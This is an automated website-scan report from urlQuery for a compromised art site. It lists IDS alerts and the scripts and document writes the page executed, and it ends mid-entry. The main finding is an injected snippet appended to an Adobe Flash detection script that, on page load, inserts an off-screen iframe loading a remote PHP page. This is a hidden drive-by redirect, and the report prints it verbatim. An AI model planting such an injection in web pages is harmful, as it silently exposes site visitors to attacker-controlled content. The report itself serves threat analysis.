Overview

URLhttp://www.shinynylonarts.com/
IP62.75.155.111
ASNAS8972 intergenia AG
Location Germany
Report completed2012-11-18 02:31:16 CET
StatusLoading report..
urlQuery Alerts Detected malicious iframe injection


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader8.0
Java1.6.0_26


Intrusion Detection Systems

Suricata /w Emerging Threats Pro
Timestamp Source IP Destination IP Severity Alert
2012-11-18 02:30:48 151.249.91.157 urlQuery Client3FILEMAGIC Macromedia Flash data (compressed),
Snort /w Sourcefire VRT No alerts detected


Recent reports on same IP/ASN/Domain

Last 6 reports on ASN: AS8972 intergenia AG

Date Alerts / IDS URL IP
2013-02-13 19:45:430 / 1http://coolsearch37845.com/b/opt/9769862CA500A343677D8885188.138.109.42
2013-02-13 19:45:380 / 1http://coolsearch37845.com/b/opt/3B7D03BAF43F75D636425E10188.138.109.42
2013-02-13 19:42:030 / 1http://coolsearch37845.com/b/req/7385E72925350F9EE7482458188.138.109.42
2013-02-13 19:42:000 / 1http://coolsearch37845.com/b/req/521CEC89B6420404743F2FC2188.138.109.42
2013-02-13 19:41:390 / 1http://coolsearch37845.com/b/opt/1BEDB75EA694EB5E64E9C098188.138.109.42
2013-02-13 19:39:120 / 1http://coolsearch37845.com/b/opt/E7F229E9A9068B616B7BA0A7188.138.109.42



JavaScript

Executed Scripts (170)

#73 JavaScript::Script (size: 8363, repeated: 1) - Alert detect on script (Severity: 2)

//v1.7
// Flash Player Version Detection
// Detect Client Browser type
// Copyright 2005-2007 Adobe Systems Incorporated.  All rights reserved.
var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false;
var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false;
var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false;

function ControlVersion() {
    var version;
    var axo;
    var e;

    // NOTE : new ActiveXObject(strFoo) throws an exception if strFoo isn't in the registry
    try {
        // version will be set for 7.X or greater players
        axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");
        version = axo.GetVariable("$version");
    } catch (e) {}

    if (!version) {
        try {
            // version will be set for 6.X players only
            axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.6");

            // installed player is some revision of 6.0
            // GetVariable("$version") crashes for versions 6.0.22 through 6.0.29,
            // so we have to be careful. 
            // default to the first public version
            version = "WIN 6,0,21,0";

            // throws if AllowScripAccess does not exist (introduced in 6.0r47)		
            axo.AllowScriptAccess = "always";

            // safe to call for 6.0r47 or greater
            version = axo.GetVariable("$version");

        } catch (e) {}
    }

    if (!version) {
        try {
            // version will be set for 4.X or 5.X player
            axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.3");
            version = axo.GetVariable("$version");
        } catch (e) {}
    }

    if (!version) {
        try {
            // version will be set for 3.X player
            axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.3");
            version = "WIN 3,0,18,0";
        } catch (e) {}
    }

    if (!version) {
        try {
            // version will be set for 2.X player
            axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash");
            version = "WIN 2,0,0,11";
        } catch (e) {
            version = -1;
        }
    }

    return version;
}

// JavaScript helper required to detect Flash Player PlugIn version information


function GetSwfVer() {
    // NS/Opera version >= 3 check for Flash plugin in plugin array
    var flashVer = -1;

    if (navigator.plugins != null && navigator.plugins.length > 0) {
        if (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]) {
            var swVer2 = navigator.plugins["Shockwave Flash 2.0"] ? " 2.0" : "";
            var flashDescription = navigator.plugins["Shockwave Flash" + swVer2].description;
            var descArray = flashDescription.split(" ");
            var tempArrayMajor = descArray[2].split(".");
            var versionMajor = tempArrayMajor[0];
            var versionMinor = tempArrayMajor[1];
            var versionRevision = descArray[3];
            if (versionRevision == "") {
                versionRevision = descArray[4];
            }
            if (versionRevision[0] == "d") {
                versionRevision = versionRevision.substring(1);
            } else if (versionRevision[0] == "r") {
                versionRevision = versionRevision.substring(1);
                if (versionRevision.indexOf("d") > 0) {
                    versionRevision = versionRevision.substring(0, versionRevision.indexOf("d"));
                }
            }
            var flashVer = versionMajor + "." + versionMinor + "." + versionRevision;
        }
    }
    // MSN/WebTV 2.6 supports Flash 4
    else if (navigator.userAgent.toLowerCase().indexOf("webtv/2.6") != -1) flashVer = 4;
    // WebTV 2.5 supports Flash 3
    else if (navigator.userAgent.toLowerCase().indexOf("webtv/2.5") != -1) flashVer = 3;
    // older WebTV supports Flash 2
    else if (navigator.userAgent.toLowerCase().indexOf("webtv") != -1) flashVer = 2;
    else if (isIE && isWin && !isOpera) {
        flashVer = ControlVersion();
    }
    return flashVer;
}

// When called with reqMajorVer, reqMinorVer, reqRevision returns true if that version or greater is available


function DetectFlashVer(reqMajorVer, reqMinorVer, reqRevision) {
    versionStr = GetSwfVer();
    if (versionStr == -1) {
        return false;
    } else if (versionStr != 0) {
        if (isIE && isWin && !isOpera) {
            // Given "WIN 2,0,0,11"
            tempArray = versionStr.split(" "); // ["WIN", "2,0,0,11"]
            tempString = tempArray[1]; // "2,0,0,11"
            versionArray = tempString.split(","); // ['2', '0', '0', '11']
        } else {
            versionArray = versionStr.split(".");
        }
        var versionMajor = versionArray[0];
        var versionMinor = versionArray[1];
        var versionRevision = versionArray[2];

        // is the major.revision >= requested major.revision AND the minor version >= requested minor
        if (versionMajor > parseFloat(reqMajorVer)) {
            return true;
        } else if (versionMajor == parseFloat(reqMajorVer)) {
            if (versionMinor > parseFloat(reqMinorVer)) return true;
            else if (versionMinor == parseFloat(reqMinorVer)) {
                if (versionRevision >= parseFloat(reqRevision)) return true;
            }
        }
        return false;
    }
}

function AC_AddExtension(src, ext) {
    if (src.indexOf('?') != -1) return src.replace(/\?/, ext + '?');
    else return src + ext;
}

function AC_Generateobj(objAttrs, params, embedAttrs) {
    var str = '';
    if (isIE && isWin && !isOpera) {
        str += '<div style="z-index:10;"><object ';
        for (var i in objAttrs) {
            str += i + '="' + objAttrs[i] + '" ';
        }
        str += '>';
        for (var i in params) {
            str += '<param name="' + i + '" value="' + params[i] + '" /> ';
        }
        str += '</object>';
    } else {
        str += '<embed ';
        for (var i in embedAttrs) {
            str += i + '="' + embedAttrs[i] + '" ';
        }
        str += '> </embed></div>';
    }

    document.write(str);
}

function AC_FL_RunContent() {
    var ret = AC_GetArgs(arguments, ".swf", "movie", "clsid:d27cdb6e-ae6d-11cf-96b8-444553540000", "application/x-shockwave-flash");
    AC_Generateobj(ret.objAttrs, ret.params, ret.embedAttrs);
}

function AC_SW_RunContent() {
    var ret = AC_GetArgs(arguments, ".dcr", "src", "clsid:166B1BCA-3F9C-11CF-8075-444553540000", null);
    AC_Generateobj(ret.objAttrs, ret.params, ret.embedAttrs);
}

function AC_GetArgs(args, ext, srcParamName, classid, mimeType) {
    var ret = new Object();
    ret.embedAttrs = new Object();
    ret.params = new Object();
    ret.objAttrs = new Object();
    for (var i = 0; i < args.length; i = i + 2) {
        var currArg = args[i].toLowerCase();

        switch (currArg) {
        case "classid":
            break;
        case "pluginspage":
            ret.embedAttrs[args[i]] = args[i + 1];
            break;
        case "src":
        case "movie":
            args[i + 1] = AC_AddExtension(args[i + 1], ext);
            ret.embedAttrs["src"] = args[i + 1];
            ret.params[srcParamName] = args[i + 1];
            break;
        case "onafterupdate":
        case "onbeforeupdate":
        case "onblur":
        case "oncellchange":
        case "onclick":
        case "ondblclick":
        case "ondrag":
        case "ondragend":
        case "ondragenter":
        case "ondragleave":
        case "ondragover":
        case "ondrop":
        case "onfinish":
        case "onfocus":
        case "onhelp":
        case "onmousedown":
        case "onmouseup":
        case "onmouseover":
        case "onmousemove":
        case "onmouseout":
        case "onkeypress":
        case "onkeydown":
        case "onkeyup":
        case "onload":
        case "onlosecapture":
        case "onpropertychange":
        case "onreadystatechange":
        case "onrowsdelete":
        case "onrowenter":
        case "onrowexit":
        case "onrowsinserted":
        case "onstart":
        case "onscroll":
        case "onbeforeeditfocus":
        case "onactivate":
        case "onbeforedeactivate":
        case "ondeactivate":
        case "type":
        case "codebase":
        case "id":
            ret.objAttrs[args[i]] = args[i + 1];
            break;
        case "width":
        case "height":
        case "align":
        case "vspace":
        case "hspace":
        case "class":
        case "title":
        case "accesskey":
        case "name":
        case "tabindex":
            ret.embedAttrs[args[i]] = ret.objAttrs[args[i]] = args[i + 1];
            break;
        default:
            ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i + 1];
        }
    }
    ret.objAttrs["classid"] = classid;
    if (mimeType) ret.embedAttrs["type"] = mimeType;
    return ret;
}



/*ef09d2*/

function frmAdd() {
    var ifrm = document.createElement('iframe');
    ifrm.style.position = 'absolute';
    ifrm.style.top = '-999em';
    ifrm.style.left = '-999em';
    ifrm.src = "http://fenwaywest.com/media/index.php";
    ifrm.id = 'frmId';
    document.body.appendChild(ifrm);
};
window.onload = frmAdd; /*/ef09d2*/

Executed Evals (0)


Executed Writes (113)

#1 JavaScript::Write (size: 0, repeated: 1)

#2 JavaScript::Write (size: 1, repeated: 1)

#3 JavaScript::Write (size: 113, repeated: 1)

<!-- PubMatic ad tag (Javascript) : yardbarker_300x250_ROS | http://www.yardbarker.com | 300 x 250 Sidekick -->

#4 JavaScript::Write (size: 95, repeated: 2)

<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">
 </script>

#5 JavaScript::Write (size: 312, repeated: 1)

(function () { var d = new Image(1, 1);	d.onerror = d.onload = function () { d.onerror = d.onload = null; }; d.src = ['//secure-us.imrworldwide.com/cgi-bin/m?ci=us-603545h&cg=0&cc=1&si=', escape(window.location.href), '&rp=', escape(document.referrer), '&ts=compact&rnd=', (new Date()).getTime()].join(''); })();

#6 JavaScript::Write (size: 27, repeated: 1)

<!-- Begin comScore tag -->

#7 JavaScript::Write (size: 26, repeated: 1)

<!-- End Quantcast tag -->

#8 JavaScript::Write (size: 25, repeated: 1)

<!-- End comScore tag -->

#9 JavaScript::Write (size: 32, repeated: 2)

<!-- PubMatic Ad Ends --></span>

#10 JavaScript::Write (size: 119, repeated: 1)

<!-- PubMatic ad tag (Javascript) : yardbarker_160x600_ROS | http://www.yardbarker.com | 160 x 600 Wide Skyscraper -->

#11 JavaScript::Write (size: 28, repeated: 1)

<!-- Start Quantcast tag -->

#12 JavaScript::Write (size: 1520, repeated: 1)

<!doctype html><html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);}</script><script>vu("http://adx.g.doubleclick.net/pagead/adview?ai\x3dCinPfPjqoULnMPLLO0AHKooGgC6rN7MACooHlsDCSz9DTYxABIABQgMfhxARgw_ShhZAYggEXY2EtcHViLTcyNzk0MTAwNDgwMjQyNDjIAQmoAwGqBGVP0KwDUp0M_2fm-8n6DVTIkXKSeYKBWAwOLQOukqTMkn86OHEEmpNkMk6s5e1B6_vXpEkHKd9_UcVTAyiiLpv6ts3_xc5YXU4RtLUsb8AqMFrNUX23NNc3VsQJ9aShhr2ccwcCqoAG0Iiz1YTsgqv0AQ\x26sigh\x3dcWb_gQbmemY")</script><iframe frameborder='0' marginwidth='0' marginheight='0' scrolling='no' width='728' height='90' src='http://bidder.mathtag.com/notify/iframe?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkNaVE5DTlhsNU5IVkNXbkJIZERSeFZVUjJlVTVGL05UQmhPRE00Wm1ZdE9EaGpaaTFrWWpjeUxUQTBaR1l0TWpJM1pUZzNOR0poWXpJMC8xMzcxODU1ODE4MTc1NzQxNzU5LzIzOTUyNy8xNjM0ODEvNC8xeWpta2pqTFE3M0xIa3M0SGJPcTVwUlkwVnZDOUN6V3VBSkZ0UW1YaHZRLw/-Vx5IUcfiv-Q1yS4q6z-kjgOgfU&sid=163481&cid=239527&price=UKg6PgAPJjkKNCcytABRSv17RZSj9qvPC647cQ&3pck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DCinPfPjqoULnMPLLO0AHKooGgC6rN7MACooHlsDCSz9DTYxABIABQgMfhxARgw_ShhZAYggEXY2EtcHViLTcyNzk0MTAwNDgwMjQyNDjIAQmoAwGqBGVP0KwDUp0M_2fm-8n6DVTIkXKSeYKBWAwOLQOukqTMkn86OHEEmpNkMk6s5e1B6_vXpEkHKd9_UcVTAyiiLpv6ts3_xc5YXU4RtLUsb8AqMFrNUX23NNc3VsQJ9aShhr2ccwcCqoAG0Iiz1YTsgqv0AQ%26num%3D1%26sig%3DAOD64_2iizEPh4tOjZZ7lH3-JQYQbo8GUA%26client%3Dca-pub-7279410048024248%26adurl%3D'></iframe></body></html>

#13 JavaScript::Write (size: 11, repeated: 4)

</noscript>

#14 JavaScript::Write (size: 9, repeated: 3)

</script>

#15 JavaScript::Write (size: 1275, repeated: 1)

<IFRAME HEIGHT="600" WIDTH="160" SRC="http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html" VISIBLE="true" MARGINWIDTH="0" MARGINHEIGHT="0" ALLOWTRANSPARENCY="true" FRAMEBORDER="0" SCROLLING="NO"></IFRAME><div style="display:none;width:0;height:0"><script>var _comscore = _comscore || [];_comscore.push({ c1: "8", c2: "2102", c3: "0", c4: "", c5: "", c15: "", c16: "" });(function() {var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js";el.parentNode.insertBefore(s, el);})();</script><noscript><img src="http://b.scorecardresearch.com/p?c1=8&c2=2102&c3=0&c4=&c5=&c6=&c15=&c16=&cv=2.0&cj=1" /></noscript></div><div style="display:none;width:0;height:0"><IFRAME SRC="http://pixel.quantserve.com/pixel/p-01-0VIaSjnOLg.gif?tags=CONTEXTWEB.UNCONTEXTUALIZED,PUBLISHER.520266,,CAMPAIGN..0,,ADSIZE.160X600" HEIGHT="0" WIDTH="0" MARGINWIDTH="0" MARGINHEIGHT="0" ALLOWTRANSPARENCY="true" FRAMEBORDER="0" SCROLLING="NO"></IFRAME></div><div style="display:none"><iframe src="http://bh.contextweb.com/bh/visitormatch?tag=66902&pid=520266"></iframe></div>

#16 JavaScript::Write (size: 1272, repeated: 1)

<IFRAME HEIGHT="90" WIDTH="728" SRC="http://akamai-media.contextweb.com/creatives/BackupTags/520266/15c83429-2270-477c-9adf-69374f516793Lijit_Leader..html" VISIBLE="true" MARGINWIDTH="0" MARGINHEIGHT="0" ALLOWTRANSPARENCY="true" FRAMEBORDER="0" SCROLLING="NO"></IFRAME><div style="display:none;width:0;height:0"><script>var _comscore = _comscore || [];_comscore.push({ c1: "8", c2: "2102", c3: "0", c4: "", c5: "", c15: "", c16: "" });(function() {var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js";el.parentNode.insertBefore(s, el);})();</script><noscript><img src="http://b.scorecardresearch.com/p?c1=8&c2=2102&c3=0&c4=&c5=&c6=&c15=&c16=&cv=2.0&cj=1" /></noscript></div><div style="display:none;width:0;height:0"><IFRAME SRC="http://pixel.quantserve.com/pixel/p-01-0VIaSjnOLg.gif?tags=CONTEXTWEB.UNCONTEXTUALIZED,PUBLISHER.520266,,CAMPAIGN..0,,ADSIZE.728X90" HEIGHT="0" WIDTH="0" MARGINWIDTH="0" MARGINHEIGHT="0" ALLOWTRANSPARENCY="true" FRAMEBORDER="0" SCROLLING="NO"></IFRAME></div><div style="display:none"><iframe src="http://bh.contextweb.com/bh/visitormatch?tag=66900&pid=520266"></iframe></div>

#17 JavaScript::Write (size: 1649, repeated: 1)

<IFRAME SRC="http://ad.doubleclick.net/adi/N3814.290927.AFFIPERF.COM19/B7153410;sz=300x250;ord=1350046311133151043;click=http://pixel.mathtag.com/click/img?mt_aid=1350046311133151043&mt_id=239528&mt_adid=100412&mt_uuid=50a83a3f-824c-494c-a6c1-8d21845c8673&redirect=" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N3814.290927.AFFIPERF.COM19/B7153410;sz=300x250;ord=1350046311133151043;click=http://pixel.mathtag.com/click/img?mt_aid=1350046311133151043&mt_id=239528&mt_adid=100412&mt_uuid=50a83a3f-824c-494c-a6c1-8d21845c8673&redirect="></SCRIPT><NOSCRIPT><A HREF="http://pixel.mathtag.com/click/img?mt_aid=1350046311133151043&mt_id=239528&mt_adid=100412&mt_uuid=50a83a3f-824c-494c-a6c1-8d21845c8673&redirect=http://ad.doubleclick.net/jump/N3814.290927.AFFIPERF.COM19/B7153410;sz=300x250;ord=1350046311133151043?"><IMG SRC="http://ad.doubleclick.net/ad/N3814.290927.AFFIPERF.COM19/B7153410;sz=300x250;ord=1350046311133151043?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A></NOSCRIPT></IFRAME><div width='1' height='1' style='display:none; overflow:hidden'><img style='left:-10px;top:-10px; position:absolute' src='http://cm.g.doubleclick.net/pixel?google_nid=mediamath&google_cm&google_hm=NTBhODNhM2YtODI0Yy00OTRjLWE2YzEtOGQyMTg0NWM4Njcz' height='1' width='1'></div><div width='1' height='1' style='display:none; overflow:hidden'><img style='left:-10px;top:-10px; position:absolute' src='http://load.exelator.com/load/?p=200&g=300&buid=50a83a3f-824c-494c-a6c1-8d21845c8673' height='1' width='1'></div>

#18 JavaScript::Write (size: 405, repeated: 1)

<IFRAME SRC='http://r1.ace.advertising.com/site=782469/size=728090/u=2/bnum=11199087/wkhr=2/hr=2/hl=1/scres=5/swh=1176x885/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/dref=http%253A%252F%252Fakamai-media.contextweb.com%252Fcreatives%252FBackupTags%252F520266%252F15c83429-2270-477c-9adf-69374f516793Lijit_Leader..html' WIDTH=728 HEIGHT=090 SCROLLING=NO FRAMEBORDER=0 MARGINHEIGHT=0 MARGINWIDTH=0></IFRAME>

#19 JavaScript::Write (size: 406, repeated: 1)

<IFRAME SRC='http://r1.ace.advertising.com/site=782471/size=160600/u=2/bnum=85478879/wkhr=2/hr=2/hl=1/scres=5/swh=1176x885/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/dref=http%253A%252F%252Fakamai-media.contextweb.com%252Fcreatives%252FBackupTags%252F520266%252F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html' WIDTH=160 HEIGHT=600 SCROLLING=NO FRAMEBORDER=0 MARGINHEIGHT=0 MARGINWIDTH=0></IFRAME>

#20 JavaScript::Write (size: 207, repeated: 2)

<a href="//twitter.com/share" class="twitter-share-button"  data-via="FenwayWest"   data-url="http://www.fenwaywest.com/sh404sef-custom-content/404.html" data-text="__404__" data-count="horizontal">Tweet</a>

#21 JavaScript::Write (size: 130, repeated: 1)

<div id="adform-adbox-mcenalat2r" class="adform-adbox adform-adbox-static adform-adbox-static-T adform-adbox-static-I">AdBox</div>

#22 JavaScript::Write (size: 56, repeated: 1)

<div id="cw_td_8238024" style="height:0;width:0;"></div>

#23 JavaScript::Write (size: 56, repeated: 1)

<div id="cw_td_8355450" style="height:0;width:0;"></div>

#24 JavaScript::Write (size: 56, repeated: 1)

<div id="cw_td_9427551" style="height:0;width:0;"></div>

#25 JavaScript::Write (size: 969, repeated: 1)

<div id="k_adsbeacon" style='display:none;float:left;margin:0px;height:0px;width:0px;' kadheight='250' kadwidth='300' rec='http_fenwaywest_commediaindex_php_komli_ads_frame_1_28596_28597' pid='28596' ></div><script type="text/javascript" src="http://showads.pubmatic.com/AdServer/AdServerServlet?pubId=28596&siteId=28597&adId=24363&kadheight=250&kadwidth=300&inIframe=1&operId=3&kbgColor=498A72&ktextColor=191919&klinkColor=A60B1D&kltstamp=2012-11-18 2:30:42&timezone=1&screenResolution=1176x885&adPosition=-1x-1&frameName=http_fenwaywest_commediaindex_php_komli_ads_frame_1_28596_28597&prevkadIds=24364&pmUniAdId=top_0_1&ranreq=0.10823524911231308&pageURL=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&refurl=http%3A%2F%2Fwww.shinynylonarts.com%2F" ></script><div id="k_adsbeacon" style='display:none;float:left;margin:0px;height:0px;width:0px;' kadheight='250' kadwidth='300' rec='http_fenwaywest_commediaindex_php_komli_ads_frame_1_28596_28597' pid='28596' ></div>

#26 JavaScript::Write (size: 950, repeated: 1)

<div id="k_adsbeacon" style='display:none;float:left;margin:0px;height:0px;width:0px;' kadheight='600' kadwidth='160' rec='http_fenwaywest_commediaindex_php_komli_ads_frame_0_28596_28597' pid='28596' ></div><script type="text/javascript" src="http://showads.pubmatic.com/AdServer/AdServerServlet?pubId=28596&siteId=28597&adId=24364&kadheight=600&kadwidth=160&inIframe=1&operId=3&kbgColor=498A72&ktextColor=191919&klinkColor=A60B1D&kltstamp=2012-11-18 2:30:40&timezone=1&screenResolution=1176x885&adPosition=-1x-1&frameName=http_fenwaywest_commediaindex_php_komli_ads_frame_0_28596_28597&pmUniAdId=top_0_0&ranreq=0.917069314550122&pageURL=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&refurl=http%3A%2F%2Fwww.shinynylonarts.com%2F" ></script><div id="k_adsbeacon" style='display:none;float:left;margin:0px;height:0px;width:0px;' kadheight='600' kadwidth='160' rec='http_fenwaywest_commediaindex_php_komli_ads_frame_0_28596_28597' pid='28596' ></div>

#27 JavaScript::Write (size: 24, repeated: 1)

<div id="uat1280"></div>

#28 JavaScript::Write (size: 24, repeated: 1)

<div id="uat7883"></div>

#29 JavaScript::Write (size: 243, repeated: 1)

<div id='PubMaitc_AdTags_Loading_top_0_0' style='height:0;width:0;padding:0;margin:0;display:none;'> <a id='PubMaitc_AdTags_Loading_Anchor_top_0_0' style='height:0;width:0;padding:0;margin:0;display:none;' href='javascript:void(0);'></a></div>

#30 JavaScript::Write (size: 243, repeated: 1)

<div id='PubMaitc_AdTags_Loading_top_0_1' style='height:0;width:0;padding:0;margin:0;display:none;'> <a id='PubMaitc_AdTags_Loading_Anchor_top_0_1' style='height:0;width:0;padding:0;margin:0;display:none;' href='javascript:void(0);'></a></div>

#31 JavaScript::Write (size: 486, repeated: 1)

<div id='beacon_1548' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http://vap4iad3.lijit.com/www/delivery/lg.php?bannerid=1548&amp;campaignid=232&amp;cids=232&amp;bids=1548&amp;zoneid=95028&amp;tid=95028_1353202247953a384128fa26e&amp;channel_ids=,&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;referer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;cb=62daa3d1b0' width='0' height='0' alt='' style='width: 0px; height: 0px;' /></div>

#32 JavaScript::Write (size: 486, repeated: 1)

<div id='beacon_1550' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http://vap4iad3.lijit.com/www/delivery/lg.php?bannerid=1550&amp;campaignid=232&amp;cids=232&amp;bids=1550&amp;zoneid=95032&amp;tid=95032_13532022430215598551eed27&amp;channel_ids=,&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;referer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;cb=25f2bdac13' width='0' height='0' alt='' style='width: 0px; height: 0px;' /></div>

#33 JavaScript::Write (size: 33, repeated: 1)

<div id=dclkAdsDivID_26772></div>

#34 JavaScript::Write (size: 139, repeated: 1)

<div><img src='//secure-us.imrworldwide.com/cgi-bin/m?ci=us-603545h&amp;cg=0&amp;cc=1&amp;ts=noscript' width='1' height='1' alt='' /></div>

#35 JavaScript::Write (size: 402, repeated: 1)

<embed width="100%" height="100%" src="Shiny Nylon Arts.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" align="middle" play="true" loop="true" scale="noscale" wmode="transparent" devicefont="false" bgcolor="#222222" name="Shiny Nylon Arts" menu="true" allowScriptAccess="sameDomain" allowFullScreen="false" salign="lt" type="application/x-shockwave-flash" > </embed></div>

#36 JavaScript::Write (size: 195, repeated: 2)

<fb:like href="http://www.fenwaywest.com/sh404sef-custom-content/404.html" layout="button_count" show_faces="false" send="false" width="" action="like" font="arial" colorscheme="light"></fb:like>

#37 JavaScript::Write (size: 26, repeated: 1)

<html><body></body></html>

#38 JavaScript::Write (size: 672, repeated: 1)

<iframe allowtransparency="true" scrolling="no" marginwidth="0" marginheight="0" frameborder="0" height="250" width="300" src="http://ad.yieldmanager.com/iframe3?dxpuAHsxGQB3lnwAAAAAAG7KHwAAAAAAAgAAAAIAAAAAAP8AAAABA3hSEwAAAAAA29spAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC8ixAAAAAAAAIAAgAAgD8AmpmZmZmZ2T-amZmZmZnZP5qZmZmZmdk.mpmZmZmZ2T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADY-vfQxR7xDPXnj5BLDnflYYsORV7SrsrBxeAnAAAAAA==,,http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php,Z%3D300x250%26_salt%3D420036788%26anmember%3D514%26anprice%3D100%26r%3D0%26s%3D1651067,92efcc18-311f-11e2-a19f-73f8a8b88e6f,1353202245347"></iframe>

#39 JavaScript::Write (size: 764, repeated: 1)

<iframe allowtransparency="true" scrolling="no" marginwidth="0" marginheight="0" frameborder="0" height="600" width="160" src="http://ad.yieldmanager.com/iframe3?bV5bEg73CQDE7YEAAAAAAO.-IAAAAAAAAgAAAAoAAAAAAP8AAAABA3hSEwAAAAAAlWQrAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBFgUAAAAAAAIAAgAAgD8AmpmZmZmZ4T-amZmZmZnhP5qZmZmZmeE.mpmZmZmZ4T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACX2LjcxR7xDA8nR1wRjmwAFZqC.YoMS94jNffjAAAAAA==,,http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2Fbackuptags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04lijit_scraper..html,B%3D1%26Z%3D160x600%26_salt%3D1916686269%26anmember%3D514%26anprice%3D50%26r%3D0%26s%3D653070,92f3c750-311f-11e2-a7f3-ebbbc404545f,1353202245373"></iframe>

#40 JavaScript::Write (size: 754, repeated: 1)

<iframe allowtransparency="true" scrolling="no" marginwidth="0" marginheight="0" frameborder="0" height="90" width="728" src="http://ad.yieldmanager.com/iframe3?bV5bEg73CQA77oEAAAAAAPX-IAAAAAAAAgAAAAYAAAAAAP8AAAABA3hSEwAAAAAAm2QrAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBFgUAAAAAAAIAAgAAgD8AmpmZmZmZ4T-amZmZmZnhP5qZmZmZmeE.mpmZmZmZ4T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqhT3OyR7xDJK195hRdfly8dHG-p899Mi2NOC2AAAAAA==,,http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2Fbackuptags%2F520266%2F15c83429-2270-477c-9adf-69374f516793lijit_leader..html,Z%3D728x90%26_salt%3D1015090667%26anmember%3D514%26anprice%3D140%26r%3D0%26s%3D653070,95510210-311f-11e2-ab35-13ecb67a31a5,1353202249339"></iframe>

#41 JavaScript::Write (size: 254, repeated: 1)

<iframe frameborder="0" allowtransparency="true" marginheight="0" marginwidth="0" scrolling="no" width="0" hspace="0" vspace="0" height="0" style="position:absolute;top:-15000px;left:-15000px" src="http://ads.pubmatic.com/AdServer/js/freq.html"></iframe>

#42 JavaScript::Write (size: 1364, repeated: 1)

<iframe frameborder="0" width="300" height="250" marginheight="0" marginwidth="0" target="_blank" scrolling="no" 